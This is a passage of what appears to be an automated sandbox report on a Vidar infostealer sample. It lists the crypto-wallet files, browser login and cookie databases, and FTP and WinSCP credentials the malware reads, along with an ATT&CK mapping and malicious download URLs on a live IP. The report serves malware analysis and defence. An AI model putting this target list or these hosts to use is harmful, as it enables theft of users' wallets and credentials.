Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: RegAsm.exe, 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: |1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: RegAsm.exe, 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: |1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: RegAsm.exe, 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: |1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Opens network shares
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: \\config\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: \\config\
                  Tries to harvest and steal Bitcoin Wallet information
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
                  Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration
                  Tries to harvest and steal browser information (history, passwords, etc)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                  Tries to harvest and steal ftp login credentials
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                  Tries to steal Crypto Currency Wallets
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\backups\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Binance\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\
                  Source: Yara matchFile source: 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 5984, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Yara detected Vidar
                  Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                  Yara detected Vidar stealer
                  Source: Yara matchFile source: 0.2.file.exe.70aac0.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.file.exe.70aac0.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.file.exe.6e0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1589701895.000000000070A000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: file.exe PID: 6856, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 5984, type: MEMORYSTR
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C8B0C40 sqlite3_bind_zeroblob,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C8B0D60 sqlite3_bind_parameter_name,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7D8EA0 sqlite3_clear_bindings,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C8B0B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7D6410 bind,WSAGetLastError,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7D6070 PR_Listen,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7DC050 sqlite3_bind_parameter_index,strlen,strncmp,strncmp,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7DC030 sqlite3_bind_parameter_count,

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                  Windows Management Instrumentation                  		1
                  DLL Side-Loading                  		1
                  DLL Side-Loading                  		1
                  Deobfuscate/Decode Files or Information                  		2
                  OS Credential Dumping                  		2
                  System Time Discovery                  		Remote Services1
                  Archive Collected Data                  		2
                  Ingress Tool Transfer                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts1
                  Native API                  		Boot or Logon Initialization Scripts511
                  Process Injection                  		2
                  Obfuscated Files or Information                  		1
                  Credentials in Registry                  		1
                  Account Discovery                  		Remote Desktop Protocol4
                  Data from Local System                  		21
                  Encrypted Channel                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain Accounts2
                  Command and Scripting Interpreter                  		Logon Script (Windows)Logon Script (Windows)1
                  DLL Side-Loading                  		Security Account Manager4
                  File and Directory Discovery                  		SMB/Windows Admin Shares1
                  Screen Capture                  		3
                  Non-Application Layer Protocol                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                  Masquerading                  		NTDS55
                  System Information Discovery                  		Distributed Component Object ModelInput Capture114
                  Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                  Virtualization/Sandbox Evasion                  		LSA Secrets1
                  Network Share Discovery                  		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts511
                  Process Injection                  		Cached Domain Credentials141
                  Security Software Discovery                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync1
                  Virtualization/Sandbox Evasion                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem12
                  Process Discovery                  		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
                  System Owner/User Discovery                  		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1442218 Sample: file.exe Startdate: 15/05/2024 Architecture: WINDOWS Score: 100 35 steamcommunity.com 2->35 41 Found malware configuration 2->41 43 Malicious sample detected (through community Yara rule) 2->43 45 Antivirus detection for URL or domain 2->45 47 8 other signatures 2->47 9 file.exe 1 2->9         started        signatures3 process4 signatures5 49 Contains functionality to inject code into remote processes 9->49 51 Writes to foreign memory regions 9->51 53 Allocates memory in foreign processes 9->53 55 Injects a PE file into a foreign processes 9->55 12 RegAsm.exe 1 45 9->12         started        17 RegAsm.exe 9->17         started        19 conhost.exe 9->19         started        process6 dnsIp7 37 steamcommunity.com 23.194.234.100, 443, 49730 AKAMAI-ASUS United States 12->37 39 95.217.240.101, 443, 49731, 49732 HETZNER-ASDE Germany 12->39 27 C:\Users\user\AppData\...\vcruntime140[1].dll, PE32 12->27 dropped 29 C:\Users\user\AppData\...\softokn3[1].dll, PE32 12->29 dropped 31 C:\Users\user\AppData\Local\...\nss3[1].dll, PE32 12->31 dropped 33 10 other files (none is malicious) 12->33 dropped 57 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 12->57 59 Found many strings related to Crypto-Wallets (likely being stolen) 12->59 61 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 12->61 65 5 other signatures 12->65 21 cmd.exe 1 12->21         started        63 Searches for specific processes (likely to inject) 17->63 file8 signatures9 process10 process11 23 conhost.exe 21->23         started        25 timeout.exe 1 21->25         started       

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  file.exe100%AviraHEUR/AGEN.1317471
                  file.exe100%Joe Sandbox ML

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\ProgramData\GHIJJEGDBFII\freebl3.dll0%ReversingLabs
                  C:\ProgramData\GHIJJEGDBFII\mozglue.dll0%ReversingLabs
                  C:\ProgramData\GHIJJEGDBFII\msvcp140.dll0%ReversingLabs
                  C:\ProgramData\GHIJJEGDBFII\nss3.dll0%ReversingLabs
                  C:\ProgramData\GHIJJEGDBFII\softokn3.dll0%ReversingLabs
                  C:\ProgramData\GHIJJEGDBFII\vcruntime140.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqlx[1].dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\freebl3[1].dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\msvcp140[1].dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\softokn3[1].dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dll0%ReversingLabs

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.0%URL Reputationsafe
                  https://store.steampowered.com/subscriber_agreement/0%URL Reputationsafe
                  https://community.cloudflare.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=engli0%URL Reputationsafe
                  https://community.cloudflare.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpE0%URL Reputationsafe
                  http://www.valvesoftware.com/legal.htm0%URL Reputationsafe
                  https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17rer.exe0%URL Reputationsafe
                  https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi0%URL Reputationsafe
                  https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback0%URL Reputationsafe
                  https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc940%URL Reputationsafe
                  https://community.cloudflare.steamstatic.com/public/css/skin_1/modalContent.css?v=.TP5s6TzX6LLh&0%URL Reputationsafe
                  https://community.cloudflare.steamstatic.com/public/javascript/modalContent.js?v=Wd0kCESeJquW&l=0%URL Reputationsafe
                  http://www.mozilla.com/en-US/blocklist/0%URL Reputationsafe
                  https://mozilla.org0/0%URL Reputationsafe
                  https://community.cloudflare.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw&0%URL Reputationsafe
                  http://store.steampowered.com/privacy_agreement/0%URL Reputationsafe
                  https://store.steampowered.com/points/shop/0%URL Reputationsafe
                  https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta0%URL Reputationsafe
                  https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK20160%URL Reputationsafe
                  https://www.ecosia.org/newtab/0%URL Reputationsafe
                  https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br0%URL Reputationsafe
                  https://store.steampowered.com/privacy_agreement/0%URL Reputationsafe
                  https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png0%URL Reputationsafe
                  https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=9620160%URL Reputationsafe
                  https://community.cloudflare.steamstatic.com/public/javascript/applications/community/libraries~b28b0%URL Reputationsafe
                  https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.png0%URL Reputationsafe
                  https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples0%URL Reputationsafe
                  https://store.steampowered.com/about/0%URL Reputationsafe
                  https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF0%URL Reputationsafe
                  https://community.cloudflare.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC&0%URL Reputationsafe
                  https://help.steampowered.com/en/0%URL Reputationsafe
                  https://store.steampowered.com/news/0%URL Reputationsafe
                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
                  http://store.steampowered.com/subscriber_agreement/0%URL Reputationsafe
                  https://community.cloudflare.steamstatic.com/public/javascript/applications/community/manifest.js?v=0%URL Reputationsafe
                  https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e170%URL Reputationsafe
                  https://steamcommunity.co100%Sophos S4illegal phishing domain
                  https://store.steampowered.com/stats/0%URL Reputationsafe
                  https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0&amp0%URL Reputationsafe
                  https://community.cloudflare.steamstatic.com/public/javascript/webui/clientcom.js?v=dERfFkkJ-bKK&amp0%Avira URL Cloudsafe
                  https://store.steampowered.com/steam_refunds/0%URL Reputationsafe
                  https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
                  https://community.cloudflare.steamstatic.com/public/images/skin_1/arrowDn9x5.gif0%URL Reputationsafe
                  https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
                  https://95.217.240.101/nss3.dll100%Avira URL Cloudmalware
                  https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_global.js?v=wJD9maDpDcV0%Avira URL Cloudsafe
                  https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v0%URL Reputationsafe
                  https://steamcommunity.com/?subsection=broadcasts0%Avira URL Cloudsafe
                  https://95.217.240.101/nss3.dll2100%Avira URL Cloudmalware
                  https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.j0%Avira URL Cloudsafe
                  https://community.cloudflare.steamstatic.com/public/javascript/promo/stickers.js?v=GfA42_x2_aub&0%Avira URL Cloudsafe
                  https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install0%URL Reputationsafe
                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
                  https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.p0%URL Reputationsafe
                  https://store.steampowered.com/legal/0%URL Reputationsafe
                  http://www.sqlite.org/copyright.html.0%URL Reputationsafe
                  https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=tuNiaSwXwcYT&l=engl0%URL Reputationsafe
                  https://95.217.240.101/freebl3.dll100%Avira URL Cloudmalware
                  https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=GfSjbGKcNYaQ&l=0%URL Reputationsafe
                  https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg0%URL Reputationsafe
                  https://community.cloudflare.steamstatic.com/public/css/skin_1/header.css?v=vh4BMeDcNiCU&l=engli0%URL Reputationsafe
                  https://store.steampowered.com/0%URL Reputationsafe
                  https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ost.exe0%URL Reputationsafe
                  https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
                  https://community.cloudflare.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=10%URL Reputationsafe
                  https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg0%URL Reputationsafe
                  https://95.217.240.101KJE0%Avira URL Cloudsafe
                  https://steamcommunity.com/login0%Avira URL Cloudsafe
                  https://steamcommunity.com/login/home/?goto=profiles%2F765611996865243220%Avira URL Cloudsafe
                  https://community.cloudflare.steamstatic.com/public/css/promo/summer2017/stickers.css?v=bZKSp7oNwVPK0%Avira URL Cloudsafe
                  https://95.217.240.101FIE0%Avira URL Cloudsafe
                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
                  https://community.cloudflare.steamstatic.com/public/shared/css/shared_responsive.css?v=eghn9DNyCY67&0%Avira URL Cloudsafe
                  https://95.217.240.101/softokn3.dll100%Avira URL Cloudmalware
                  https://community.cloudflare.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&amp0%Avira URL Cloudsafe
                  https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=2VoZa2M8Wh3k&0%Avira URL Cloudsafe
                  https://community.cloudflare.steamstatic.com/public/shared/images/responsive/he0%Avira URL Cloudsafe
                  https://community.cloudflare.steamstatic.com/public/javascript/applications/community/main.js?v=yF_q0%Avira URL Cloudsafe
                  https://steamcommunity.com/market/0%Avira URL Cloudsafe
                  https://95.217.240.101/msvcp140.dllU100%Avira URL Cloudmalware
                  https://steamcommunity.com/my/wishlist/0%Avira URL Cloudsafe
                  https://95.217.240.101100%Avira URL Cloudmalware
                  https://95.217.240.101/freebl3.dlls100%Avira URL Cloudmalware
